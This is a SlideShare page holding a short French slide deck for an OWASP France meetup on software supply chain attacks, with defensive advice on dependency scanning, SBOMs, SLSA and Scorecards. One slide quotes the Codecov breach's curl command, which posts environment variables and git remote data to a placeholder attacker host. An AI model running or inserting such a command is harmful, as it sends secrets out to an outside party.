Successfully reported this slideshow.
Your SlideShare is downloading. ×

REX CraftConf 2022 / Supply Chain Attack

Jun. 16, 2022
0 likes 26 views
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Upcoming SlideShare
Software Composition Analysis in PHP
Software Composition Analysis in PHP
Loading in …3
×

Check these out next

Continuous (Non)-Functional Testing of Microservices on k8s
QAware GmbH
Docker Azure Friday OSS March 2017 - Developing and deploying Java & Linux on...
Patrick Chanezon
Security in serverless world
Yan Cui
DevSecCon London 2018: Security in the serverless world
DevSecCon
[JOI] TOTVS Developers Joinville - Java #1
Rubens Dos Santos Filho
Simplify Networking for Containers
LinuxCon ContainerCon CloudOpen China
Serverless security: defense against the dark arts
Yan Cui
Continuous (Non-)Functional Testing of Microservices on K8s
QAware GmbH
1 of 7 Ad

REX CraftConf 2022 / Supply Chain Attack

Jun. 16, 2022
0 likes 26 views

Download to read offline

Technology

REX CraftConf 2022 / Supply Chain Attack

REX CraftConf 2022 / Supply Chain Attack

Technology
Advertisement

Recommended

Software Composition Analysis in PHP
Piotr Horzycki
236 views
36 slides
CI / CD / CS - Continuous Security in Kubernetes
Sysdig
1.2k views
46 slides
Continuous Security: From tins to containers - now what!
Michael Man
456 views
34 slides
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Brian Vermeer
29 views
42 slides
MongoDB.local DC 2018: MongoDB Ops Manager + Kubernetes
MongoDB
750 views
46 slides
MongoDB.local Austin 2018: MongoDB Ops Manager + Kubernetes
MongoDB
168 views
32 slides
Pragmatic Pipeline Security
James Wickett
276 views
80 slides
Serverless security: defence against the dark arts
Yan Cui
875 views
180 slides
Advertisement

More Related Content

Similar to REX CraftConf 2022 / Supply Chain Attack (20)

Continuous (Non)-Functional Testing of Microservices on k8s
QAware GmbH
459 views
Docker Azure Friday OSS March 2017 - Developing and deploying Java & Linux on...
Patrick Chanezon
888 views
Security in serverless world
Yan Cui
1.5k views
DevSecCon London 2018: Security in the serverless world
DevSecCon
298 views
[JOI] TOTVS Developers Joinville - Java #1
Rubens Dos Santos Filho
174 views
Simplify Networking for Containers
LinuxCon ContainerCon CloudOpen China
524 views
Serverless security: defense against the dark arts
Yan Cui
1.7k views
Continuous (Non-)Functional Testing of Microservices on K8s
QAware GmbH
156 views
Very Early Review - Rocket(CoreOS)
충섭 김
4.1k views
What's Next Replay - SpringSource
ZenikaOuest
217 views
KubeClarity - CNCF Webinar.pptx
LibbySchulze
490 views
Vulnerability Intelligence and Assessment with vulners.com
Alexander Leonov
2.3k views
Automating cloud security - Jonny Griffin
Jonnathan Griffin
97 views
Red Hat and kubernetes: awesome stuff coming your way
Johannes Brännström
151 views
betterCode Workshop: Effizientes DevOps-Tooling mit Go
QAware GmbH
688 views
Minko - Scripting 3D apps with Lua and C++
Minko3D
3.3k views
Weave User Group Talk - DockerCon 2017 Recap
Patrick Chanezon
2.9k views
Cloud-native Java EE-volution
QAware GmbH
460 views
Catching Multilayered Zero-Day Attacks on MS Office
Kaspersky
2.6k views
MicroProfile, Docker, Kubernetes, Istio and Open Shift lab @dev nexus
Emily Jiang
110 views
Continuous (Non)-Functional Testing of Microservices on k8s
QAware GmbH
459 views
26 slides
Docker Azure Friday OSS March 2017 - Developing and deploying Java & Linux on...
Patrick Chanezon
888 views
65 slides
Security in serverless world
Yan Cui
1.5k views
172 slides
DevSecCon London 2018: Security in the serverless world
DevSecCon
298 views
172 slides
[JOI] TOTVS Developers Joinville - Java #1
Rubens Dos Santos Filho
174 views
74 slides
Simplify Networking for Containers
LinuxCon ContainerCon CloudOpen China
524 views
22 slides

More from Yvan PHELIZOT (6)

Smart XSS fuzzer
Yvan PHELIZOT
135 views
2019 meetup web_sec_crafting_securesoftware
Yvan PHELIZOT
63 views
Crafting Secure Software - DDDEU 2019
Yvan PHELIZOT
409 views
Arrêtons de perdre du temps #NoEstimates
Yvan PHELIZOT
199 views
50 shades of fizzbuzz v2 - share
Yvan PHELIZOT
169 views
How to become a domain expert in no time?
Yvan PHELIZOT
117 views
Smart XSS fuzzer
Yvan PHELIZOT
135 views
11 slides
2019 meetup web_sec_crafting_securesoftware
Yvan PHELIZOT
63 views
17 slides
Crafting Secure Software - DDDEU 2019
Yvan PHELIZOT
409 views
66 slides
Arrêtons de perdre du temps #NoEstimates
Yvan PHELIZOT
199 views
26 slides
50 shades of fizzbuzz v2 - share
Yvan PHELIZOT
169 views
29 slides
How to become a domain expert in no time?
Yvan PHELIZOT
117 views
40 slides
Advertisement

Recently uploaded (20)

БИМПРО - создание информационных моделей BIM
ElleCarinel
0 views
Commitments and Chaos
Anna Marie Clifton
0 views
intro to git github.pdf
DikshantSharma63
0 views
Open Source 101 - Observability For You and Me with OpenTelemetry
Eric D. Schabell
0 views
Jeri Taylor Kony.ppsx
Jeri Taylor
0 views
Benefits of android app development.pdf
Seasia Infotech
0 views
Adiwijaya for SNTIKI UIN SUSKA 26 Oktober 2022 .pdf
ELSAHARMANIOLASISTEM
0 views
A.L.P - B12.pdf
DIANAMELISATAIROCOND1
0 views
Inductance Calculation by Rohit Damodaran
Anto Sujesh
3 views
Oracle Integration Cloud – Pragmatic approach to integrations
Jade Global
3 views
How To Automate a Cloud Compliance Platform_.pdf
TransformHub1
0 views
CISSP (Updated)_Certificate of Achievement.pdf
SorinArseneOnu
0 views
Llama-index
Denis973830
0 views
Dare To Be Presentation
shaimaa934851
0 views
Azure Synapse LInk
nnakasone
33 views
MCube_slides_20min.pptx
ManishSharma846413
0 views
GAIB Latam - Tailoring OpenAI’s GPT-3 to suit your specific needs.pptx
Luis775803
2 views
HARDWARE AND SOFTWARE.pptx
PriyanshiArora16
0 views
iot_module2.pdf
ranjanraj56
0 views
Logo and Business Card Feedback
TillyBrown1
0 views
БИМПРО - создание информационных моделей BIM
ElleCarinel
0 views
28 slides
Commitments and Chaos
Anna Marie Clifton
0 views
123 slides
intro to git github.pdf
DikshantSharma63
0 views
8 slides
Open Source 101 - Observability For You and Me with OpenTelemetry
Eric D. Schabell
0 views
28 slides
Jeri Taylor Kony.ppsx
Jeri Taylor
0 views
10 slides
Benefits of android app development.pdf
Seasia Infotech
0 views
1 slide

REX CraftConf 2022 / Supply Chain Attack

  1. 1. REX CraftConf 2022 OWASP France Meetup juin 2022
  2. 2. Supply Chain Attacks +650% (Sonatype 2021 report - https://www.sonatype.com/resources/state-of-the-software-supply-chain-2021)
  3. 3. Exemples SolarWinds/Orion - Initial Access: ??? CodeCov - OpenSource App de scan de code - Initial Access: mot de passe dans une image docker - Exfiltration: curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKERIP/upload/v2 || true https://blog.gitguardian.com/codecov-supply-chain-breach/
  4. 4. Google/Eric Brewer Google ⇒ Nation-grade attackers - 1 giant codebase - Single trusted build system - Proof that code review happened - Knowledge of authors & reviewers - Universal libs (same version) - Private repos
  5. 5. Conseils/Outils/Méthodes… - SCA (npm audit/python safety/…) - Choisissez / Évaluer vos dépendances - Réduire le nombre de dépendances - “Update or die” - SBOM (Dependency Track!) / Savoir ce qui tourne sur votre cluster / en production - Educate! https://twitter.com/garrows/status/1 065217184643768320?lang=fr
  6. 6. (Google) Conseils/Outils/Méthodes… - SLSA: https://github.com/slsa-framework/s lsa - OpenSSF Security ScoreCards: https://github.com/ossf/scorecard - Open Source Insights : https://deps.dev - https://osv.dev/
  7. 7. OpenSource is like a puppy Come for free but with responsibility

×